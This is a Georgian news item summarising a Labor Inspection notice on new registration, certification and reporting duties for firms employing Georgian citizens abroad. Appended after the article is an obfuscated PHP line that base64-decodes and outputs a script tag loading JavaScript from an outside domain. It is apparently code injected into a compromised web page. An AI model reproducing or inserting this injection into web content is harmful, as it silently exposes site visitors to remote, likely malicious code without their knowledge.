celsiusi
ავერსი შნაიდერი

შრომის ინსპექცია იმ კომპანიებისთვის, რომელთა საქმიანობაც დაკავშირებულია საქართველოს მოქალაქეების ან საქართველოში მუდმივი ბინადრობის ნებართვის მქონე უცხოელების საზღვარგარეთ დასაქმებასთან, ინფორმაციას ავრცელებს.

როგორც გავრცელებულ ინფორმაციაშია ნათქვამი, აღნიშნულ კომპანიებს გარკვეული ვალდებულები აქვთ შესაშრულებელი.

„პირველი სექტემბრიდან ფიზიკური პირი ან კომპანია, რომლის საქმიანობაც დაკავშირებულია საქართველოს მოქალაქეების ან საქართველოში მუდმივი ბინადრობის ნებართვის მქონე უცხოელების საზღვარგარეთ დასაქმებასთან, ვალდებულია: დარეგისტრირდეს ეკონომიკურ საქმიანობათა რეესტრში კოდით 78.10.0; მოიპოვოს შესაბამისი საქმიანობის სერტიფიკატი, რომელსაც გასცემს ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის სამინისტრო; წელიწადში ორჯერ, სამინისტროს წარუდგინოს განხორციელებული საქმიანობის შესახებ ანგარში.

სერტიფიკატის მოპოვებისათვის სავალდებულო კრიტერიუმებია: შესაბამისი მატერიალურ-ტექნიკური რესურსით აღჭურვილი საოფისე ფართი; შესაბამისი პერსონალის არსებობა; დოკუმენტი ვალდებულების შესრულების გარანტიის შესახებ; ცნობა საშუამავლო კომპანიის გადახდისუუნარობის საქმის წარმოების არარსებობისა და დავალიანების არარსებობის შესახებ.

ვალდებულებების შეუსრულებლობა გამოიწვევს პასუხისმგებლობის დაკისრებას. რეგისტრაციისა და დეტალური ინფორმაციისათვის ეწვიეთ ვებგვერდს“, – ნათქვამია განცხადებაში.

704
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");